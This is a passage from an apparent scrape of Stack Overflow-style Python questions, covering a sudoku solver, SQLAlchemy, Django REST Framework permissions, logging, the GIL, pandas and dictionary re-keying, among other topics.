[[&quot;.&quot;,&quot;.&quot;,&quot;9&quot;,&quot;7&quot;,&quot;4&quot;,&quot;8&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;7&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;], 
[&quot;.&quot;,&quot;2&quot;,&quot;.&quot;,&quot;1&quot;,&quot;.&quot;,&quot;9&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;7&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;2&quot;,&quot;4&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;6&quot;,&quot;4&quot;,&quot;.&quot;,&quot;1&quot;,&quot;.&quot;,&quot;5&quot;,&quot;9&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;9&quot;,&quot;8&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;3&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;8&quot;,&quot;.&quot;,&quot;3&quot;,&quot;.&quot;,&quot;2&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;6&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;2&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;.&quot;,&quot;.&quot;]] </code></pre> <p>the correct output is</p> <pre><code>board = [[&quot;5&quot;,&quot;1&quot;,&quot;9&quot;,&quot;7&quot;,&quot;4&quot;,&quot;8&quot;,&quot;6&quot;,&quot;3&quot;,&quot;2&quot;], [&quot;7&quot;,&quot;8&quot;,&quot;3&quot;,&quot;6&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;1&quot;,&quot;9&quot;], [&quot;4&quot;,&quot;2&quot;,&quot;6&quot;,&quot;1&quot;,&quot;3&quot;,&quot;9&quot;,&quot;8&quot;,&quot;7&quot;,&quot;5&quot;], [&quot;3&quot;,&quot;5&quot;,&quot;7&quot;,&quot;9&quot;,&quot;8&quot;,&quot;6&quot;,&quot;2&quot;,&quot;4&quot;,&quot;1&quot;], [&quot;2&quot;,&quot;6&quot;,&quot;4&quot;,&quot;3&quot;,&quot;1&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;], [&quot;1&quot;,&quot;9&quot;,&quot;8&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;3&quot;,&quot;6&quot;,&quot;7&quot;], [&quot;9&quot;,&quot;7&quot;,&quot;5&quot;,&quot;8&quot;,&quot;6&quot;,&quot;3&quot;,&quot;1&quot;,&quot;2&quot;,&quot;4&quot;], [&quot;8&quot;,&quot;3&quot;,&quot;2&quot;,&quot;4&quot;,&quot;9&quot;,&quot;1&quot;,&quot;7&quot;,&quot;5&quot;,&quot;6&quot;], 
[&quot;6&quot;,&quot;4&quot;,&quot;1&quot;,&quot;2&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;,&quot;3&quot;]] </code></pre> <p>while the code has the incorrect board</p> <pre><code>board = [[&quot;3&quot;,&quot;1&quot;,&quot;9&quot;,&quot;7&quot;,&quot;4&quot;,&quot;8&quot;,&quot;6&quot;,&quot;5&quot;,&quot;2&quot;], [&quot;7&quot;,&quot;8&quot;,&quot;5&quot;,&quot;6&quot;,&quot;3&quot;,&quot;2&quot;,&quot;1&quot;,&quot;1&quot;,&quot;9&quot;], [&quot;4&quot;,&quot;2&quot;,&quot;6&quot;,&quot;1&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;,&quot;7&quot;,&quot;3&quot;], [&quot;5&quot;,&quot;3&quot;,&quot;7&quot;,&quot;9&quot;,&quot;8&quot;,&quot;6&quot;,&quot;2&quot;,&quot;4&quot;,&quot;1&quot;], [&quot;2&quot;,&quot;6&quot;,&quot;4&quot;,&quot;3&quot;,&quot;1&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;], [&quot;1&quot;,&quot;9&quot;,&quot;8&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;3&quot;,&quot;6&quot;,&quot;7&quot;], [&quot;9&quot;,&quot;7&quot;,&quot;1&quot;,&quot;8&quot;,&quot;6&quot;,&quot;3&quot;,&quot;4&quot;,&quot;2&quot;,&quot;5&quot;], [&quot;8&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;9&quot;,&quot;1&quot;,&quot;7&quot;,&quot;3&quot;,&quot;6&quot;], [&quot;6&quot;,&quot;4&quot;,&quot;3&quot;,&quot;2&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;,&quot;4&quot;]] </code></pre> <p>EDIT:</p> <p>I changed the <code>go_through_recursive</code> to store the unique possible value directly into the board, in this case the only possible set length in the dictionary is 2 or greater. 
But this seems to get stuck in an infinite loop</p> <pre><code> def go_through_recursive(self, board, b, d=False): &quot;&quot;&quot; :param board: sudoku board as matrix where each row is a line :param b: sudoku board as a single long list &quot;&quot;&quot; numbers = {'1', '2', '3', '4', '5', '6', '7', '8', '9'} while True: old_count = b.count('.') missing_dict = {} # populate missing_dict for idx in range(len(b)): if b[idx] == '.': row, col, box = idx // 9, idx % 9, (idx // 27) * 3 + (idx % 9) // 3 # union of all the present values in current row, col and box values = self.get_row(row, b).union(self.get_col(col, b)).union(self.get_box(box, b)) values.remove('.') missing_ones = numbers.difference(values) # possible values to input in the slot if len(missing_ones) == 0: # impossible to continue return False elif len(missing_ones) == 1: b[idx] = missing_ones.pop() else: missing_dict[idx] = missing_ones if b.count('.') == 0: # check if complete self.create_board_from_list(board, b) return True if b.count('.') == old_count: # if no progress has been made for idx, s in missing_dict.items(): # iterate through the dictionary for number in s: # create a new board and store indecisive value then recur bb = b[:] bb[idx] = number if self.go_through_recursive(board, bb): return True </code></pre>
<python><algorithm><sudoku>
2024-01-14 08:29:31
1
616
Fabio Olivetto
77,814,328
5,459,343
Consistent characters with DALL E-3 and python API
<p>How can I generate consistent characters across multiple images using the OpenAI Python API for DALL-E 3? I've successfully achieved this by directly prompting the model on the OpenAI website (e.g., by referencing a seed number), but I'm uncertain about replicating the same behavior through the API. Any guidance or examples would be appreciated.</p>
<python><openai-api><image-generation>
2024-01-14 08:18:57
0
573
J.K.
77,814,327
5,798,365
Sorting in the ascending and then in the descending order in Python without negation
<p>I have this list:</p> <pre><code>L = [(1, 'a'), (4, 'k'), (3, 'p'), (3, 'q'), (2, 'a'), (2, 'b'), (1, 'z')] </code></pre> <p>which I want to sort in the ascending order by the 0th element of each tuple and <em>then</em> in the descending order by the 1st one. What's the way to do that?</p> <p>I could use the general approach:</p> <pre><code>L.sort(key=lambda x: (x[0], -x[1])) </code></pre> <p>but it's impossible because there's no <code>-</code> operation for strings.</p> <p>How should I call <code>sort</code> to get what I need?</p>
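One standard trick: Python's sort is guaranteed stable, so two passes work. Sort by the secondary key in reverse first, then by the primary key; ties in the second pass keep their (descending) order from the first. A sketch with the question's data:

```python
L = [(1, 'a'), (4, 'k'), (3, 'p'), (3, 'q'), (2, 'a'), (2, 'b'), (1, 'z')]

# Python's sort is stable, so sort by the secondary key first ...
L.sort(key=lambda t: t[1], reverse=True)   # descending by the string
# ... then by the primary key: ties keep their (descending) order
L.sort(key=lambda t: t[0])                 # ascending by the number

print(L)
# [(1, 'z'), (1, 'a'), (2, 'b'), (2, 'a'), (3, 'q'), (3, 'p'), (4, 'k')]
```

This avoids negation entirely, so it works for strings and any other non-negatable key type.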
<python><sorting>
2024-01-14 08:18:48
2
861
alekscooper
77,814,292
4,281,998
Sqlalchemy: for loop over related collection skips items
<p>I'm trying to iterate through a related collection (<code>user.addresses</code> below), and disassociate all of them from the parent <code>User</code>. When I set a breakpoint in the loop, my debugger shows the collection has say 3 items, but advancing execution may only hit the breakpoint one more time. In all of my testing it has never iterated through the whole collection. This is reflected in the DELETE statements: it does not delete all related Addresses.</p> <p>I stripped/trimmed down this code from a FastAPI project.</p> <pre class="lang-py prettyprint-override"><code>from sqlalchemy import String, ForeignKey, select, delete from sqlalchemy.ext.asyncio import AsyncSession from sqlalchemy.orm import ( DeclarativeBase, Mapped, mapped_column, relationship, selectinload, ) class Base(DeclarativeBase): pass class User(Base): __tablename__ = &quot;user_account&quot; id: Mapped[int] = mapped_column(primary_key=True) name: Mapped[str] = mapped_column(String(30)) fullname: Mapped[str | None] addresses: Mapped[list[&quot;Address&quot;]] = relationship(back_populates=&quot;user&quot;, cascade=&quot;save-update, merge, delete, delete-orphan&quot;) def __repr__(self) -&gt; str: return f&quot;User(id={self.id!r}, name={self.name!r}, fullname={self.fullname!r})&quot; class Address(Base): __tablename__ = &quot;address&quot; id: Mapped[int] = mapped_column(primary_key=True) email_address: Mapped[str] user_id = mapped_column(ForeignKey(&quot;user_account.id&quot;)) user: Mapped[User] = relationship(back_populates=&quot;addresses&quot;) def __repr__(self) -&gt; str: return f&quot;Address(id={self.id!r}, email_address={self.email_address!r})&quot; async def update_user(id: int, new_user, db: AsyncSession) -&gt; User: result = await db.scalars(select(User).filter_by(id=id).options(selectinload(User.addresses))) user = result.first() # not relevant to question if user is None: pass user.name = new_user.name user.fullname = new_user.fullname for address in user.addresses: 
address.user = None # BREAKPOINT HERE for address in new_user.addresses: db.add(Address(email_address=address.email_address, user=user)) await db.flush() return user </code></pre>
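A likely explanation (hedged, but it matches the symptom): setting <code>address.user = None</code> makes SQLAlchemy's <code>back_populates</code> machinery remove that <code>Address</code> from <code>user.addresses</code> while the loop is still iterating over that same collection, so the iterator skips every other item. Iterating over a snapshot, e.g. <code>for address in list(user.addresses):</code>, avoids this. The same skipping effect is reproducible with a plain Python list:

```python
# Mutating any list while iterating skips every other element:
items = [1, 2, 3, 4]
for x in items:
    items.remove(x)   # shrinks the list under the iterator
skipped = items
print(skipped)  # [2, 4] -- half the elements were never visited

# Iterating over a snapshot removes everything:
items = [1, 2, 3, 4]
for x in list(items):
    items.remove(x)
print(items)  # []
```

In the ORM code, `for address in list(user.addresses):` (or `user.addresses.clear()`, given the `delete-orphan` cascade) should detach every address.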
<python><sqlalchemy><python-asyncio>
2024-01-14 08:02:26
1
3,611
Brady Dean
77,814,150
2,964,170
How to find the next element using Python Selenium
<pre><code> browser.find_element(By.ID,'thread-0-list') browser.find_element(By.ID,'tpz_body') browser.find_element(By.ID,'view') browser.find_element(By.ID,'topaz') browser.find_element(By.ID,'X1') browser.find_element('id','X4') browser.find_element('id','X7') browser.find_element('id','X9') -- empty elements </code></pre> <p><a href="https://i.sstatic.net/fkE77.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/fkE77.png" alt="'X9' inside the 'X4' but returns empty" /></a><a href="https://i.sstatic.net/14UTF.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/14UTF.png" alt="empty elements from X1Container" /></a> Thank you for your support. The child divs are returned empty; how can I find the next available element using Selenium with Python?</p> <p><a href="https://i.sstatic.net/dn2zw.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/dn2zw.png" alt="next element showing empty object" /></a></p> <pre><code>browser.find_elements(By.XPATH, &quot;//*[@id='X7']&quot;) --- finds the element, but browser.find_elements(By.XPATH, &quot;//*[@id='X9']&quot;) -- empty element </code></pre>
<python><selenium-webdriver><selenium-chromedriver>
2024-01-14 06:41:57
2
425
Vas
77,813,880
1,397,922
How to hide fields in order_line based on some value of their parent (order_id) in Odoo v16?
<p>Is there any way to hide some fields in purchase order line based on some conditions/value of their parent (order_id). I've tried this way:</p> <pre><code>&lt;field name=&quot;price_subtotal&quot; attrs=&quot;{'invisible': [('order_id.currency_id.name', '=', 'IDR')]}&quot;/&gt; </code></pre> <p>But unfortunately, this one only works with Odoo v7 and lower. I use v16 by the way. Thanks in advance.</p>
<python><xml><odoo>
2024-01-14 03:47:54
1
550
Andromeda
77,813,551
5,896,591
Python2.7: How to create a new StreamHandler without losing the module name on each output line?
<p>I want to replace the default <code>StreamHandler</code>, to redirect output to a different stream. However, when I create a new <code>StreamHandler</code>, the module name no longer appears in logging output:</p> <pre><code>import logging logging.basicConfig(level = logging.INFO) LOG = logging.getLogger(__name__) for handler in logging.getLogger().handlers: logging.getLogger().removeHandler(handler) logging.getLogger().addHandler(logging.StreamHandler()) # without the above 3 lines: INFO:__main__:hello # with the above 3 lines: hello LOG.info('hello') </code></pre> <p>Is it possible to create a new <code>StreamHandler</code> without losing the module name on each output line?</p>
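A handler only prints the bare message unless it has a formatter; `basicConfig` installs one for you, but a freshly constructed `StreamHandler()` has none. A minimal sketch (written in Python 3 syntax here, but `logging.BASIC_FORMAT` and `setFormatter` exist in 2.7 as well), using a `StringIO` as a stand-in for the different stream:

```python
import logging
import io

stream = io.StringIO()
handler = logging.StreamHandler(stream)
# logging.BASIC_FORMAT is the "%(levelname)s:%(name)s:%(message)s" layout
# that basicConfig installs by default; attaching it restores the module name.
handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT))

root = logging.getLogger()
for h in list(root.handlers):     # iterate over a copy while removing
    root.removeHandler(h)
root.addHandler(handler)
root.setLevel(logging.INFO)

logging.getLogger("mymodule").info("hello")
assert stream.getvalue() == "INFO:mymodule:hello\n"
```

When all you need is a different stream, passing `stream=...` straight to `basicConfig` is an even shorter route.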
<python><python-2.7><logging><python-logging>
2024-01-14 00:13:36
1
4,630
personal_cloud
77,813,470
13,281,808
Django rest framework is providing the wrong parameters to custom permission class
<p>I'm having an issue where Django Rest Framework's custom permission system is treating my custom permissions' methods like they are <code>classmethods</code> or <code>staticmethods</code>.</p> <p>When hitting a breakpoint in the permission method:</p> <pre><code>def has_permission(self, request, view=None): </code></pre> <ul> <li><code>self</code> is an instance of request instead of an instance of the permission class</li> <li><code>request</code> is an instance of view</li> <li>and I had to put view=None because it was crashing with missing parameter errors</li> </ul> <p>Have I configured it wrong somehow?</p> <p>My <code>IsEmailVerified</code> permission used as a default permission has been working as expected for a month, but when adding custom permissions more programmatically I get errors.</p> <pre><code> File &quot;/app/api/permissions.py&quot;, line 50, in has_permission user = request.user ^^^^^^^^^^^^ AttributeError: 'ExampleViewSet' object has no attribute 'user' </code></pre> <p>settings.py:</p> <pre><code>REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': ( 'api.authentication.TokenAuthentication', ), 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', 'api.permissions.IsEmailVerifiedPermission', ), . . . 
} </code></pre> <p>permissions.py</p> <pre><code>class IsEmailVerifiedPermission(BasePermission): def has_permission(self, request, view=None): return request.user.email_verified def has_object_permission(self, request, view=None, obj=None): return request.user.email_verified class UserCreated(BasePermission): def has_permission(self, request, view=None): # While debugging the parameters don't line up: # self is an instance of request # request is an instance of view # and I had to put view=None because it was crashing with missing parameter errors def has_object_permission(self, request, view=None, obj=None): # See above issue class CanGloballyEdit(BasePermission): def has_permission(self, request, view=None): # See above issue def has_object_permission(self, request, view=None, obj=None): # See above issue </code></pre> <p>views/example.py</p> <pre><code>class ExampleViewSet(viewsets.GenericViewSet): serializer_class = ExampleSerializer def get_permissions(self): default_permissions = super(viewsets.GenericViewSet, self).get_permissions() if self.action == 'list': return [CanGloballyEdit] + default_permissions if self.action == 'retrieve': return [UserCreated] + default_permissions if self.action in ('update', 'partial_update'): return [UserCreated | CanGloballyEdit] + default_permissions return default_permissions </code></pre>
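The symptoms (every argument shifted one position to the left) are what you get when `get_permissions()` returns permission *classes* instead of *instances*: DRF calls `permission.has_permission(request, view)` on whatever you return, so on a class the call is unbound and the request lands in `self`. A stand-alone sketch of the mechanism, with `Request`/`View` as stand-ins for the DRF objects:

```python
class Request:   # stand-in for the DRF request, just for illustration
    user = "alice"

class View:      # stand-in for the DRF view
    pass

class UserCreated:
    def has_permission(self, request, view=None):
        return (self, request)

# Roughly what DRF does internally: permission.has_permission(request, view).
# If get_permissions() returned the *class*, the call is unbound, so every
# argument shifts one position to the left:
self_arg, request_arg = UserCreated.has_permission(Request(), View())
assert isinstance(self_arg, Request)    # "self" is actually the request
assert isinstance(request_arg, View)    # "request" is actually the view

# Returning an *instance* lines the parameters up again:
perm = UserCreated()
self_arg, request_arg = perm.has_permission(Request(), View())
assert isinstance(self_arg, UserCreated)
assert isinstance(request_arg, Request)
```

If that is the cause here, returning `[CanGloballyEdit()] + default_permissions` (and, for the composed case, instantiating the result of `UserCreated | CanGloballyEdit`) should fix it; the default permissions work because DRF instantiates `DEFAULT_PERMISSION_CLASSES` itself.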
<python><django><django-rest-framework><permissions>
2024-01-13 23:29:26
1
379
NateOnGuitar
77,813,441
2,056,201
Cannot activate venv while debugging in Visual Studio Code
<p>I am able to activate the venv in the VSCode terminal using the <code>venv/Scripts/activate</code> command.</p> <p>I can run the Python script in the terminal.</p> <p>But when I try to debug the same script in VSCode, it does not run in the venv and I get missing dependency errors.</p> <p>What are the steps to enable the venv when debugging Python in VSCode?</p> <p>The only instructions I can find are for the &quot;Python: Select Interpreter&quot; setting.</p> <p>Is this the same as activating the virtual environment? Do I just point it to <code>venv/Scripts/Python.exe</code> and it will work without activating anything?</p>
<python><windows><visual-studio-code>
2024-01-13 23:16:55
2
3,706
Mich
77,813,013
15,452,898
Create subsets in Python based on special conditions
<p>I am currently doing some data manipulation procedures and have run into a problem of how to make subsets based on special conditions.</p> <p>My example (dataframe) is like this:</p> <pre><code>Name ID ContractDate LoanSum DurationOfDelay A ID1 2023-01-01 10 0 A ID1 2023-01-03 15 0 A ID1 2022-12-29 20 35 A ID1 2022-12-28 40 91 B ID2 2023-01-05 15 0 B ID2 2023-01-10 30 100 B ID2 2023-01-07 35 40 B ID2 2023-01-06 35 0 C ID3 2023-01-09 20 0 C ID3 2023-01-07 30 0 C ID3 2023-01-11 35 0 </code></pre> <p>My goal is to create two different subsets (two new dataframes):</p> <ol> <li>Create a table that includes the loans only issued last</li> </ol> <p>Expected result:</p> <pre><code>Name ID ContractDate LoanSum DurationOfDelay A ID1 2023-01-03 15 0 B ID2 2023-01-10 30 100 C ID3 2023-01-11 35 0 </code></pre> <ol start="2"> <li>Group the data in such a way that for each borrower only the loan issued first with DurationOfDelay &gt; 0 is returned</li> </ol> <p>Expected result:</p> <pre><code>Name ID ContractDate LoanSum DurationOfDelay A ID1 2022-12-28 40 91 B ID2 2023-01-07 35 40 </code></pre> <p>Would you be so kind to help me achieve these results? Any kind of help is highly appreciated!</p>
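Assuming pandas (the sample reads like a pandas frame, although the question is also tagged pyspark), both subsets fall out of `groupby(...).idxmax()` / `idxmin()` on `ContractDate`. A sketch on a trimmed-down version of the sample data:

```python
import pandas as pd

df = pd.DataFrame({
    "Name": ["A", "A", "A", "B", "B"],
    "ID": ["ID1", "ID1", "ID1", "ID2", "ID2"],
    "ContractDate": pd.to_datetime(
        ["2023-01-01", "2023-01-03", "2022-12-28", "2023-01-05", "2023-01-07"]),
    "DurationOfDelay": [0, 0, 91, 0, 40],
})

# 1) last-issued loan per borrower: the row with the max ContractDate per ID
last_loans = df.loc[df.groupby("ID")["ContractDate"].idxmax()]

# 2) first loan with DurationOfDelay > 0 per borrower: filter, then idxmin
delayed = df[df["DurationOfDelay"] > 0]
first_delayed = delayed.loc[delayed.groupby("ID")["ContractDate"].idxmin()]

assert list(last_loans["ContractDate"].dt.strftime("%Y-%m-%d")) == \
    ["2023-01-03", "2023-01-07"]
assert list(first_delayed["DurationOfDelay"]) == [91, 40]
```

In PySpark the same idea is usually expressed with `Window.partitionBy("ID")` plus `row_number()` ordered by `ContractDate`.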
<python><dataframe><pyspark><filtering><data-manipulation>
2024-01-13 20:37:27
1
333
lenpyspanacb
77,812,660
893,254
Why does the presence of the Global Interpreter Lock not prevent data corruption issues when using thread shared state?
<p>I am trying to understand exactly what the Global Interpreter Lock (GIL) in Python protects, and what it does not protect.</p> <p>An example code which demonstrates an answer to this question would be useful. I can't create such a thing myself, because I do not fully understand what state the GIL protects and what it does not protect.</p> <p>Python has threads and those threads can share state. In languages like C, any many others, in order to access the shared state we might use something like a mutex, a semaphore, a condition variable or some other construct which provides synchronization or atomicity. Typically such things would be implemented by communication with the Operating System via system calls, which provides a single point of synchronization and control. (The OS thread.)</p> <p>If I understand correctly, the Python GIL prevents more than one thread executing Python code - which is interpreted by the Python Interpreter.</p> <p>Further, if I understand correctly, if we spawn 8 Python threads, then we still only have 1 Python Interpreter.</p> <p>Those threads then become useful under two conditions:</p> <ul> <li>a thread has to go away and do some IO operation, which releases the GIL allowing another thread to execute Python code</li> <li>a thread calls into some code which is implemented in a language like C. In some cases this code will explicitly release and then later re-acquire the GIL. Numpy is an example of such a library.</li> </ul> <p>I can't quite imagine why the GIL is not sufficient to protect the shared state between 2 or more Python threads.</p> <p>Can someone explain this to me? A code example demonstrating why synchronization primatives such as a mutex are required would be very helpful.</p>
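A concrete illustration of the gap: the GIL makes each individual *bytecode* atomic, but `counter += 1` compiles to a read, an add, and a write, and the GIL may be released between them, so another thread's update can be lost. The sketch below spells out the read-modify-write (with a `sleep(0)` to encourage a thread switch at the worst moment) and shows that a `threading.Lock` closes the window:

```python
import threading
import time

N_THREADS, N_ITER = 4, 500

def run(use_lock):
    counter = 0
    lock = threading.Lock()

    def worker():
        nonlocal counter
        for _ in range(N_ITER):
            if use_lock:
                with lock:
                    counter += 1
            else:
                # read-modify-write spelled out: the GIL guarantees each
                # *bytecode* runs atomically, but it can be released between
                # the read and the write, so another thread's update is lost
                value = counter
                time.sleep(0)          # hint: let another thread run here
                counter = value + 1

    threads = [threading.Thread(target=worker) for _ in range(N_THREADS)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return counter

with_lock = run(True)
without_lock = run(False)
assert with_lock == N_THREADS * N_ITER       # mutex: no lost updates
assert without_lock <= N_THREADS * N_ITER    # without it, updates can be lost
```

On a typical run `without_lock` comes out well below 2000, which is exactly the data corruption the GIL does not prevent.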
<python><multithreading><gil>
2024-01-13 18:37:18
1
18,579
user2138149
77,812,632
11,357,623
factory pattern with lambda
<p>How would you create a factory-based method using a lambda?</p> <p>The function signature looks like this. The factory gets a string parameter and returns the instance.</p> <pre><code>class Foo: @abstractmethod def store(factory: Callable[[str], Bar]) obj = factory(&quot;abc&quot;) # store or call to get instance class Bar: def __init__(self): pass </code></pre> <p>How do I call this method using a lambda?</p> <pre><code>Foo.store(lambda k: Bar(k)) </code></pre> <p>Error:</p> <blockquote> <p>Parameter 'factory' unfilled</p> </blockquote>
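One plausible reading of the PyCharm warning: `store` is declared without `self`, so when it is treated as an instance method the lambda fills the `self` slot and `factory` is left unfilled. A hedged sketch marking it `@staticmethod` instead (names kept from the question; `Bar` is given a `key` attribute purely for illustration):

```python
from typing import Callable

class Bar:
    def __init__(self, key: str):
        self.key = key

class Foo:
    @staticmethod
    def store(factory: Callable[[str], Bar]) -> Bar:
        # the factory is just a callable: pass a string in, get a Bar back
        return factory("abc")

# Since Bar's constructor already matches the (str) -> Bar signature,
# the class itself can serve as the factory; no lambda needed:
obj = Foo.store(Bar)
assert obj.key == "abc"

# A lambda works too, e.g. to adapt the argument on the way in:
obj = Foo.store(lambda k: Bar(k.upper()))
assert obj.key == "ABC"
```

If `store` really must be an abstract instance method, it needs an explicit `self` first parameter and has to be called on an instance of a concrete subclass.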
<python><factory>
2024-01-13 18:28:00
1
2,180
AppDeveloper
77,812,285
13,968,392
column order relevant in df.to_sql(if_exists="append")?
<p>I was wondering, whether <code>df.to_sql(&quot;db_table&quot;, con=some_engine, if_exists=&quot;append&quot;)</code> requires that the order of the columns of <code>df</code> (a dataframe) and <code>db_table</code> (a database table) has to be the same. There is nothing about it in the <a href="https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_sql.html#pandas.DataFrame.to_sql" rel="nofollow noreferrer">documentation</a>, so I tried it out. The result is that the order doesn't have to be the same. However, where can I find out whether the order has to match, without trying an example code? How can I find the location where it is revealed what if_exists=&quot;append&quot; does (for example, in PyCharm)?</p>
<python><sql><pandas><pandas-to-sql>
2024-01-13 16:53:39
1
2,117
mouwsy
77,812,185
3,123,290
Accessing Eager-Loaded Relationships When Lazy Loading in Async Sqlalchemy
<p>Asyncio Sqlalchemy has the nifty <code>awaitable_attrs</code> that allows you to lazy load relationships you might otherwise be forced to eager load. However, when you <em>do</em> lazy load relationship objects, those objects do not appear to execute their respective relationship loading strategies. For example:</p> <pre class="lang-py prettyprint-override"><code> class Parent(Base): __tablename__ = &quot;parent&quot; children:Mapped[&quot;Child&quot;] = relationship(&quot;Child&quot;, back_populates=&quot;parent&quot;) class Child(Base): __tablename__ = &quot;child&quot; parent_id:Mapped[int] = mapped_column(ForeignKey(&quot;parent.id&quot;)) parent: Mapped[&quot;Parent&quot;] = relationship(&quot;Parent&quot;) toys:Mapped[List[&quot;Toy&quot;]] = relationship(&quot;Toy&quot;, lazy=&quot;selectin&quot;) </code></pre> <p>You would expect this:</p> <pre class="lang-py prettyprint-override"><code> async with db_session: children = await parent.awaitable_attrs.children print(children[0].toys) # prints [Toy('thing'), Toy('other thing')] </code></pre> <p>but what you'll actually get is this</p> <pre class="lang-bash prettyprint-override"><code>Error extracting attribute: DetachedInstanceError: Parent instance 'Child' is not bound to a Session; lazy load operation of attribute 'toys' cannot proceed </code></pre>
<python><sqlalchemy><python-asyncio>
2024-01-13 16:25:55
1
778
EthanK
77,812,156
2,779,432
Reassign dictionary key values
<p>I have this dictionary</p> <pre><code>brands = { 1: 'BPR Performance Rimfire', 2: 'M22', 3: 'M22 Subsonic', 4: 'Super Suppressed', 5: 'Super X', 6: 'USA', 7: 'Varmint HE', 8: 'Varmint LF', 9: 'Wildcat', 10: 'Xpert', } </code></pre> <p>and depending on some user selection I want to display a subset of this dictionary in the form of a menu, which I can do but I would like to update the keys so that if I'm only showing three elements such as</p> <pre><code>1 -- BPR Performance Rimfire 5 -- Super X 7 -- Varmint HE </code></pre> <p>I could reassign the number corresponding to the option, for example</p> <pre><code>1 -- BPR Performance Rimfire 2 -- Super X 3 -- Varmint HE </code></pre> <p>To do so, I have made these two functions</p> <pre><code>def entries_to_remove(entries, dictionary): for key in entries: if key in dictionary: del dictionary[key] def update_keys(dictionary): dict_copy = dictionary.copy() key_n = 1 for k in dictionary: dict_copy[key_n] = dict_copy.pop(k) key_n = key_n + 1 return dict_copy </code></pre> <p>then I define the entries to remove, which works</p> <pre><code>entries = (2, 3, 4, 6, 9, 10) entries_to_remove(entries, brands) </code></pre> <p>and then call</p> <pre><code>brands = update_keys(brands) </code></pre> <p>which gives me an error in the function entries_to_remove</p> <pre><code> File &quot;C:\Users\teide\Documents\Guns\moa_clicks.py&quot;, line 70, in addBullet entries_to_remove(entries, brands) ^^^^^^ UnboundLocalError: cannot access local variable 'brands' where it is not associated with a value </code></pre> <p>If I comment out <code>brands = update_keys(brands)</code> the code executes normally and gives me the expected result</p> <pre><code>Choose brand 1 -- BPR Performance Rimfire 5 -- Super X 7 -- Varmint HE 8 -- Varmint LF </code></pre> <p>I don't understand what I'm doing wrong and some help would be greatly appreciated.</p> <p>I'm adding the full code that I have at the moment</p> <pre><code>menu_options = { 1: 'Add bullet 
type', 2: 'Calculate MOA clicks', 3: 'Exit', } cartridge_types = { 1: '17 HMR', 2: '17 Win Super Mag', 3: '22 Long', 4: '22 Long Rifle', 5: '22 Short', 6: '22 Win Mag', 7: '22 WRF', } brands = { 1: 'BPR Performance Rimfire', 2: 'M22', 3: 'M22 Subsonic', 4: 'Super Suppressed', 5: 'Super X', 6: 'USA', 7: 'Varmint HE', 8: 'Varmint LF', 9: 'Wildcat', 10: 'Xpert', } def print_menu(menu): for key in menu.keys(): print (key, '--', menu[key] ) def entries_to_remove(entries, dictionary): for key in entries: if key in dictionary: del dictionary[key] def update_keys(dictionary): dict_copy = dictionary.copy() key_n = 1 for k in dictionary: dict_copy[key_n] = dict_copy.pop(k) key_n = key_n + 1 return dict_copy def addBullet(): name = str(input('Enter bullet name: ')) print('Choose cartridge type') print_menu(cartridge_types) cType = cartridge_types.get(int(input())) if cType == cartridge_types.get(1): entries = (2, 3, 4, 6, 9, 10) entries_to_remove(entries, brands) #brands = update_keys(brands) print('Choose brand') print_menu(brands) brand = brands.get(int(input())) while(True): print_menu(menu_options) option = int(input('Enter your choice: ')) if option == 1: addBullet() elif option == 2: calculateMOA() elif option == 3: print('Goodbye') exit() else: print('Invalid option. Please enter a number between 1 and 3.') </code></pre>
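Two separate things seem to be going on here: the re-keying can be a one-liner with `enumerate`, and the `UnboundLocalError` comes from the later `brands = update_keys(brands)` assignment, which makes `brands` local to `addBullet` for the *entire* function body. A sketch of both, with a `global` declaration as one possible fix:

```python
brands = {1: 'BPR Performance Rimfire', 5: 'Super X', 7: 'Varmint HE'}

def update_keys(dictionary):
    # renumber the surviving entries 1..n, preserving their order
    return {i: name for i, name in enumerate(dictionary.values(), start=1)}

assert update_keys(brands) == {
    1: 'BPR Performance Rimfire', 2: 'Super X', 3: 'Varmint HE'}

# Why the UnboundLocalError happens: assigning to a name anywhere inside a
# function makes that name local for the whole function, so an earlier read
# (like the `entries_to_remove(entries, brands)` call) hits an unassigned
# local instead of the module-level dict.
def broken():
    value = brands_copy          # read happens first...
    brands_copy = {}             # ...but this assignment makes it local
    return value

brands_copy = dict(brands)
raised = False
try:
    broken()
except UnboundLocalError:
    raised = True
assert raised

# Fix: declare the name global (or pass it in and return the new dict).
def fixed():
    global brands
    brands = update_keys(brands)

fixed()
assert list(brands) == [1, 2, 3]
```

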